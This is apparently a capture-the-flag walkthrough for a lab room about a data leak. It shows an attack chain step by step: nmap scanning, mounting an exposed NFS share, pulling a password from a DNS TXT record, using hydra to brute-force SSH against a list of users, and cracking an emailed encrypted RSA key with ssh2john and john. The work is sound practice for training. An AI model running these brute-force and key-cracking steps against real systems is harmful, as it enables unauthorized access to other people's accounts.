This room is about NFS, DNS, SSH and Mail. So take your time and enumerate carefully.
Step 1) Read the attached MEMO carefully
Read the provided PDF. Who could be leaking data?
Step 2) Deploy the VM and start enumerating
Lets start with nmap and see which ports are open:
nmap -sV -sC <IP>
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
111/tcp open rpcbind
2049/tcp open nfs
Lets start with the NFS-Share:
showmount -e <IP>
/srv/secret 192.168.230.0/255.255.255.0,10.0.0.0/255.0.0.0
Ok, there is a share /srv/secret lets mount it
mount <IP>:/srv/secret /mnt
Lets check what we can find there
drwxr-xr-x 5 root root 4096 Dec 13 15:18 .
drwxr-xr-x 19 root root 4096 Dec 13 03:55 ..
d——— 3 root root 4096 Dec 11 07:07 …
drwxr-xr-x 2 root root 4096 Dec 13 14:59 images
-rw-r–r– 1 root root 22899 Dec 13 15:04 jail.conf
-rw——- 1 root root 16384 Dec 13 15:17 .jail.conf.swp
drwxr-xr-x 2 root root 4096 Dec 11 06:28 jail.d
-rw——- 1 root root 385 Dec 13 15:02 security-note-txt
-rw-r–r– 1 1004 1004 86 Dec 13 15:05 telefon.txt
-rw-r–r– 1 root root 27818 Dec 13 15:18 .unkown.png
There are many interesting things on that share. And somewhere is a flag 🙂
- .unknown.png looks interesting. There seems to be some hint regarding DNS. We will try this out in a minute.
- images seems to be interesting too.
- security-note-txt looke some base64 stuff
Step 3) Analyze the content of the nfs share. Fire up your first DNS query
We will try out the DNS. Looks like there are some TXT records in the zone. Lets try it:
dig dieter.kraut.thm TXT @<IP>
will give you a password – maybe for the user dieter?
Step 4) Access the VM via ssh
Lets SSH in the machine
ssh dieter@<IP> with the given password.
We will get a hint about a default password. Now we need to think about which user this could be. Remember the note about fail2ban.
Which user should we use to test this? Remember the telefon.txt This will give us a short list. We can remove Dieter and Hans from that list.
Since Peter is the CEO he should not work with the default password. This leaves us with:
karl
wolfgang
markus
Which we will put in a list named /tmp/user
Lets start hydra then:
hydra -L/tmp/user -p „logmein!42“ ssh://<IP>
markus is the user who has still the default password.
Step 5) It is Mail-Time
enumerate the VM after log in as markus
You have new mail.
markus@kraut:~$
That looks interesting. Lets have a look if we can find something useful there:
mail will give us three unread emails
one email is from „wurst“ whoever that is and contains an private key:
—–BEGIN RSA PRIVATE KEY—–
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EA107208EE6B3469EB5651115721E91E
8QUr9Q2+Alcq98MuKIk8bRKov5tg+arPoKV9fzBqHP+EGhFBzqEfD0DSVnymLV8X
…
83xzBVAa47GVh+ypSZz0aqubq7Xq3kPumQ43XoF9/I01OflDA47ty/lsKhSdBH3/
—–END RSA PRIVATE KEY—–
Lets use ssh2john and john to crack the password for this key.
After cracking the password we might have an ssh key to another user account. Maybe hans or root?
Step 6) getting root
After getting root access (there are two ways one via ssh and the other via priv escalation) we could start searching some flags:
1st flag: nfs-share .../.../.../.flag.txt
2nd and 3rd flag somewhere in the home directory of Dieter and Karl (not used)
4th flag in the home of Hans Mail/sent
5th flag in a zone file inside of /etc/bind (not used)
6th flag in the root-home (not used)
7th flag in the root mailbox
8th flag in the base64-code (not used)
Step 7) Who has leaked the information?
Who has leaked the information? Hans or Markus?
- Look at the QR-Code and read some mails from the mailboxes of Hans, Markus and maybe Peter.
echo“VGh…yYXV0IHRobXthbHdheXNfb25fa3JhdXR9Cg==“ | base64 -d
in Kiel 